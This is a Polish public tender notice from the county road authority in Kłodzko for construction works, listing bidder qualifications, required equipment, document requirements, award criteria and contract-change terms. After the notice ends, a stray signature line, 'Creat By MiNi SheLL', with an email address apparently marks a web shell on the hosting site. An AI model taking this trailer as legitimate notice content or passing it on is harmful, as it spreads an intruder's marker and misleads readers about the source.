Zamawiający dokona oceny spełnienia warunku w oparciu o uzupełniony przez Wykonawcę  Wykaz osób (załącznik nr 11 do SIWZ).
W przypadku Wykonawców wspólnie ubiegających się o zamówienie warunek ten należy spełnić łącznie.
Zamawiający określając wymogi dla osoby w zakresie posiadanych uprawnień budowlanych, wymaga określonych uprawnień budowlanych na podstawie aktualnie obowiązującej ustawy z dn. 7 lipca 1994 r.  Prawo budowlane (tj. Dz. U. z 2016 r. poz. 290 z późn. zm.), rozumie przez to również odpowiadające im ważne uprawnienia budowlane, wydane na podstawie uprzednio obowiązujących przepisów prawa lub odpowiednich przepisów państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub państw członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA)  stron umowy o Europejskim Obszarze Gospodarczym, którzy nabyli prawo do wykonywania określonych zawodów regulowanych lub określonych działalności, jeżeli te kwalifikacje zostały uznane na zasadach przewidzianych w ustawie z dn. 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2016 r. poz. 65) lub art. 20a ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. z 2014 r. poz. 1946 z późn. zm.)
Osoby wskazane do realizacji zamówienia w wykazie osób, na dzień podpisania umowy musza posiadać aktualne zaświadczenia o wpisie na listę członków właściwej Izby Samorządu Zawodowego, potwierdzone zaświadczeniem wydanym przez tę Izbę i o ubezpieczeniu od odpowiedzialności cywilnej (dające prawo wykonywania samodzielnych funkcji technicznych).
c) dysponuje lub będzie dysponował (posiadanie, dzierżawa, wynajem, umowa kupna lub w inny sposób) następującym potencjałem technicznym w celu realizacji zamówienia:
 wysoko wydajną koparką do wykonania wykopu o głębokości co najmniej 4 m;
 wibromłotem;
 dźwigiem samochodowym lub kolejowym o nośności co najmniej 20 t;
 samochodem ciężarowym samowyładowczym
 płytą wibracyjną 500;
 podbijarką uniwersalną torowo-rozjazdową;
Zamawiający dokona oceny spełnienia warunku w oparciu o uzupełniony przez Wykonawcę Wykaz narzędzi i urządzeń niezbędnych do wykonania zamówienia (załącznik nr 12 do SIWZ)
W przypadku Wykonawców wspólnie ubiegających się o zamówienie warunek ten należy spełnić łącznie.<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1. Dla wykazania braku podstaw wykluczenia z postępowania Wykonawcy Zamawiający żąda złożenia następujących dokumentów (w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia  niżej wymienione dokumenty składa każdy z Wykonawców występujących wspólnie; w przypadku innego podmiotu, na którego zdolnościach lub sytuacji Wykonawca polega, nw. dokumenty składa w odniesieniu do każdego z tych podmiotów): 1) odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy; 2.Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w ust. 1 pkt. 1) składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: nie otwarto jego likwidacji ani nie ogłoszono upadłości. 3. Dokumenty, o których mowa w ust. 2 powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 4. Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa w ust. 2, zastępuje się je dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy lub miejsce zamieszkania tej osoby. Ust. 3 stosuje się</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej Zamawiający żąda następujących dokumentów:
1) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów na rzecz których roboty te zostały wykonane z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone.
Zakres przedstawionych dokumentów musi potwierdzać spełnienie odpowiedniego warunku określonego w rozdziale VI. 3. 1) lit. a) SIWZ. Wzór wykazu znajduje się w załączniku nr 10 do SWIZ  Wykaz robót budowlanych.
Dowodami o których mowa powyżej są referencje bądź inne dokumenty wystawione przez podmiot na rzecz którego roboty budowlane były wykonane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów  oświadczenie Wykonawcy.
W przypadku, gdy Zamawiający (Zarząd Dróg Powiatowych w Kłodzku) jest podmiotem, na rzecz którego roboty budowlane wskazane w Wykazie robót budowlanych zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów potwierdzających czy roboty te zostały wykonane należycie.
2) wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.
Zakres przedstawionych dokumentów musi potwierdzać spełnienie odpowiedniego warunku określonego w rozdziale VI. 3. 1) lit. b) SIWZ. Wzór wykazu znajduje się w załączniku nr 11 do SWIZ  Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia
3) wykaz narzędzi lub urządzeń technicznych dostępnych Wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami;
Zakres przedstawionych dokumentów musi potwierdzać spełnienie odpowiedniego warunku określonego w rozdziale VI. 3. 1) lit. c) SIWZ. Wzór wykazu znajduje się w załączniku nr 12 do SWIZ  Wykaz narzędzi i urządzeń niezbędnych do wykonania zamówienia.<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Oferta musi zawierać następujące oświadczenia i dokumenty: 1) wypełniony formularz ofertowy sporządzony z wykorzystaniem wzoru stanowiącego załącznik nr 7 do SIWZ; 2) wypełnione kosztorysy ofertowe sporządzony z wykorzystaniem wzoru stanowiącego załącznik nr 8 do SIWZ; 3) wypełnione oświadczenie własne wykonawcy z wykorzystaniem wzoru stanowiącego załącznik nr 9 do SIWZ; 4) pełnomocnictwo złożone w oryginale lub poświadczona notarialnie kopia do reprezentowania Wykonawcy, o ile ofertę składa pełnomocnik; 5) w przypadku spółki cywilnej, wspólnicy nie przedstawiają osobnego dokumentu zawierającego pełnomocnictwo, jednakże uprawnienia do reprezentacji spółki przysługujące każdemu ze wspólników ma wynikać z samej umowy spółki cywilnej dołączonej do oferty;</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Gwarancja</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zmiana umowy może być dokonana w przypadku zmian nieistotnych w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy lub w przypadku okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, a w szczególności: 1)dopuszczalna jest zmiana terminu zakończenia robót o okres trwania przyczyn, z powodu których będzie zagrożone dotrzymanie terminu zakończenia robót, w następujących sytuacjach: a)jeżeli przyczyny, z powodu których będzie zagrożone dotrzymanie terminu zakończenia robót będą następstwem okoliczności, za które odpowiedzialność ponosi Zamawiający, w szczególności będą następstwem nieterminowego przekazania terenu budowy, konieczności zmian Dokumentacji projektowej w zakresie, w jakim ww. okoliczności miały lub będą mogły mieć wpływ na dotrzymanie terminu zakończenia robót, b)gdy wystąpią niekorzystne warunki atmosferyczne uniemożliwiające prawidłowe wykonanie robót, w szczególności z powodu technologii realizacji prac określonej: Umową, normami lub innymi przepisami, wymagającej konkretnych warunków atmosferycznych, jeżeli konieczność wykonania prac w tym okresie nie jest następstwem okoliczności, za które Wykonawca ponosi odpowiedzialność, c)gdy wystąpi konieczność wykonania robót zamiennych lub innych robót niezbędnych do wykonania przedmiotu Umowy ze względu na zasady wiedzy technicznej, oraz udzielenia zamówień dodatkowych, które wstrzymują lub opóźniają realizację przedmiotu Umowy, wystąpienia niebezpieczeństwa kolizji z planowanymi lub równolegle prowadzonymi przez inne podmioty inwestycjami w zakresie niezbędnym do uniknięcia lub usunięcia tych kolizji, d)wystąpią opóźnienia w dokonaniu określonych czynności lub ich zaniechanie przez właściwe organy administracji państwowej, które nie są następstwem okoliczności, za które Wykonawca ponosi odpowiedzialność, e)gdy wystąpią opóźnienia w wydawaniu decyzji, zezwoleń, uzgodnień, itp., do wydania których właściwe organy są zobowiązane na mocy przepisów prawa, jeżeli opóźnienie przekroczy okres, przewidziany w przepisach prawa, w którym ww. decyzje powinny zostać wydane oraz nie są następstwem okoliczności, za które Wykonawca ponosi odpowiedzialność, f)jeżeli wystąpi brak możliwości wykonywania robót z powodu nie dopuszczania do ich wykonywania przez uprawniony organ lub nakazania ich wstrzymania przez uprawniony organ, z przyczyn niezależnych od Wykonawcy, g)jeżeli w wyniku przedłużającej się procedury o udzielenie zamówienia, zagrożony jest umowny termin zakończenia robót, przesunięcie terminu nastąpi o okres niezbędny do prawidłowego zrealizowania robót budowlanych będących przedmiotem umowy; h)wystąpienia Siły wyższej uniemożliwiającej wykonanie przedmiotu Umowy zgodnie z jej postanowieniami. 2)dopuszczalna jest zmiana umowy polegająca na zmianie danych Wykonawcy bez zmiany samego Wykonawcy (np. zmiana siedziby, adresu); 3)dopuszczalna jest zmiana Wykonawcy  tylko i wyłącznie w przypadku sukcesji generalnej, przekształcenia, dziedziczenia spółek handlowych zgodnie z KSH, sukcesji z mocy prawa; 4)dopuszczalna jest zmiana kierownika budowy/ kierownika robót zgoda może zostać udzielona, pod warunkiem zapewnienia przez Wykonawcę nowego kierownika budowy/kierownika robót który posiada kwalifikacje zgodne z wymaganiami określonymi w SIWZ; 5)dopuszczalna jest zmiana Inspektora Nadzoru Inwestorskiego; 6)dopuszczalna jest zmiana zakresu robót i wynagrodzenia, jeżeli wystąpią okoliczności powodujące zmniejszenie zakresu przedmiotu zamówienia; w umowie zostaną wprowadzone zmiany dotyczące wynagrodzenia Wykonawcy; 7)dopuszczalna jest zmiana zakresu robót i wynagrodzenia, jeżeli wystąpią okoliczności powodujące zwiększenie zakresu przedmiotu zamówienia, tj. konieczność wykonania dodatkowych robót budowlanych, nieobjętych zamówieniem podstawowym, których Zamawiający działając z należytą starannością nie mógł przewidzieć, a których wykonanie stało się niezbędne do prawidłowego wykonania zamówienia podstawowego, o których mowa w § 1 ust. 4; 8)dopuszczalna jest możliwość zadeklarowania przez Wykonawcę realizacji zamówienia przy pomocy podwykonawców i/lub zmiany zakresu robót, które Wykonawca powierzy Podwykonawcą; 9)dopuszczalna jest zmiana stawki podatku VAT i w związku z tym zmiana cen jednostkowych brutto  tylko w przypadku wystąpienia urzędowej zmiany stawki podatku VAT, zaistniałej po dacie zawarcia umowy; 10)dopuszczalna jest zmiana danych, które mogą wpływać na wystawianie i obieg faktur, oraz ich księgowanie i rozliczanie dla celów podatkowych, takich jak nazwa firmy, numer konta, numer NIP.<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 17/05/2017, godzina: 11:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              POLSKI<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com